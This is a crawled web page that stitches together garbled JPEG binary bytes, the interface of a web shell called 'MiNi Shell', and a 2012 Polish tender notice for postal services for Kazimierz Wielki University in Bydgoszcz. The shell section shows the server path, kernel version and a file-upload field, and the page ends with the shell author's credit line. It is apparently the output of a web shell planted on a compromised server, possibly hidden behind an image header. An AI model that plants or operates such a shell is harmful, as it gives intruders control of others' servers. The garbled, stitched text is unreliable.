JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/254077-N-2012.html

<p class="kh_header"><b>Bydgoszcz: Świadczenie usług pocztowych dla Uniwersytetu Kazimierza Wielkiego w Bydgoszczy.</b><br>
<b>Numer ogłoszenia: 254077 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Kazimierza Wielkiego , ul. Chodkiewicza 30, 85-064 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3419100, faks 052 3608206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ukw.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych dla Uniwersytetu Kazimierza Wielkiego w Bydgoszczy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiotem zamówienia jest: Świadczenie usług pocztowych dla Uniwersytetu Kazimierza Wielkiego w Bydgoszczy.

1.2. Usługa pocztowa obejmuje przyjmowanie, przemieszczanie i doręczanie przesyłek
pocztowych o wadze do 50g. i powyżej 50 g oraz ich ewentualnych zwrotów.
1.3.Wykonawca przyjmuje do wiadomości, że przyjmowanie, przemieszczanie i doręczanie
przesyłek wykonywane będzie zgodnie z przepisami:
a. ustawy z dnia 12.06.2003 roku Prawo pocztowe (Dz. U. z 2008 roku,nr 189, poz. 1159 z późn. zm.),
b. rozporządzenia Ministra Infrastruktury z dnia 13.10.2003 roku wsprawie reklamacji powszechne usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. z 2003 roku, Nr 183, poz.1795 z późn. zm.),
c. rozporządzenia Ministra Infrastruktury z dnia 09.01.2004roku w sprawie warunków wykonywania powszechnych usług pocztowych ( Dz. U. z 2004 roku, Nr 5 poz. 34. z późn. zm. ),
f. ustawy z dnia 17.11.1964 roku kodeks postępowania cywilnego (Dz.U. z 1964 roku, nr 43, poz. 296 z późn. zm.),
g. rozporządzenie Ministra Sprawiedliwości z dnia 12.10.2010 roku w sprawie szczegółowego trybu doręczania pism sądowych przez pocztę w postępowaniu cywilnym (Dz. U. z 2010 roku, nr 190, poz.1277),
h. ustawy z dnia 14.06.1960 roku kodeks postępowania administracyjnego (Dz. U. z 2000 roku, nr 98, poz. 1071 z późn. zm.),
i. międzynarodowych przepisów pocztowych.
1.4. Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich
przekazania Wykonawcy przez Zamawiającego, z tym że nadanie przesyłki priorytetowej
po godzinie 15:00 traktowane jest jako nadanie w dniu następnym,
1.5. Usługa dostarczania przesyłek świadczona będzie do każdego wskazanego przez
Zamawiającego adresu w Polsce i za granicą,
1.6. Wykonawca zobowiązany jest doręczać przesyłki pocztowe codziennie w dni robocze (od
poniedziałku do piątku) do Kancelarii - pokój 108  w siedzibie Zamawiającego przy ul. Chodkiewicza 30 w Bydgoszczy, przez przedstawiciela Wykonawcy, na podstawie upoważnienia, w wyznaczonym przedziale czasowym, wg następującego wykazu (w przypadku, gdy Wykonawca będzie wymagać upoważnienia do przekazywania przesyłek pracownikom Zamawiającego, przekaże Zamawiającemu wzór formularza do wypełnienia),
1.7.Zwrot niedoręczonych przesyłek do siedzib Zamawiającego odbywać się będzie
niezwłocznie po wyczerpaniu możliwości ich doręczenia, z podaniem przyczyny
niedoręczenia,
1.8.Świadczenie przez Wykonawcę dla przesyłek rejestrowanych, usługi
komplementarnej - potwierdzenia odbioru przesyłki rejestrowanej: Wykonawca będzie
doręczał do siedzib Zamawiającego pokwitowane przez adresata potwierdzenie odbioru,
niezwłocznie po dokonaniu doręczenia przesyłki, nie później niż w ciągu 7 dni roboczych
od dnia doręczenia,
1.9. Zamawiający określił w Formularzu ofertowo-cenowym (Załącznik nr
2 do SIWZ) przewidywane ilości nadawanych przesyłek przez okres obowiązywania
umowy podpisanej z wybranym Wykonawcą. Rodzaje i liczba przesyłek są szacunkowe i
mogą ulec zmianie w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża
zgodę tym samym oświadczając, że nie będzie dochodził roszczeń z tytułu zmian
rodzajowych i liczbowych w trakcie realizacji umowy. Do kalkulacji ilości przesyłek
każdego rodzaju Zamawiający przyjął średnie miesięczne ilości przesyłek każdego
rodzaju, z tym, że Zamawiający nie jest zobowiązany do realizowania podanych ilości
przesyłek. Faktyczne ilości realizowanych przesyłek w skali miesięcznej mogą odbiegać
od podanych średnich ilości. W przypadku nadania przez Zamawiającego przesyłek
nieujętych w Formularzu ofertowo-cenowym podstawą rozliczeń będą ceny z aktualnego
Cennika usług Wykonawcy
1.10 Za okres rozliczeniowy przyjmuje się jeden miesiąc kalendarzowy. Podstawą
obliczenia należności będzie suma opłat za przesyłki faktycznie nadane lub zwrócone z
powodu braku możliwości ich doręczenia w okresie rozliczeniowym, potwierdzona co do
ilości i wagi na podstawie dokumentów nadawczych lub dokumentów oddawczych
dokumentujących zwrot przesyłek, kiedy możliwość dostarczenia została wyczerpana.
Do rozliczeń z Wykonawcą przyjęte będą ceny z Formularza ofertowego z uwzględnieniem należnych Zamawiającemu upustów (jeśli takowe będą przysługiwały Zamawiającemu, z uwagi na ilość przesłanych przesyłek).
1.11. Reklamacje z tytułu niewykonania usługi Zamawiający może zgłosić do Wykonawcy
po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż 12 miesięcy
od ich nadania. Termin udzielenia odpowiedzi na reklamację nie może przekroczyć 30 dni
od dnia otrzymania reklamacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają
                 aktualne zezwolenie na wykonywanie działalności pocztowej wydane przez Prezesa
                 Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ustawy z dnia 12 czerwca
                 2003 r. Prawo pocztowe (Dz. U. z 2008 roku, nr 89, poz. 1159 z póżń. zm.)
                 
2)	Załącznikami do Formularza oferty, stanowiącymi integralną jego cześć będą:
                   - Regulamin świadczenia usług pocztowych Wykonawcy,
       - Cennik usług Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ukw.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Kazimierza Wielkiego w Bydgoszczy, ul. Chodkiewicza 30, 85-064 Bydgoszcz, Biuro ds. Zamówień Publicznych, pokój 04,  Budynek E,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 09:00, miejsce: Siedziba Zamawiającego w Bydgoszczy ul. Chodkiewicza 30, Sekretariat Kanclerza  pokój 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com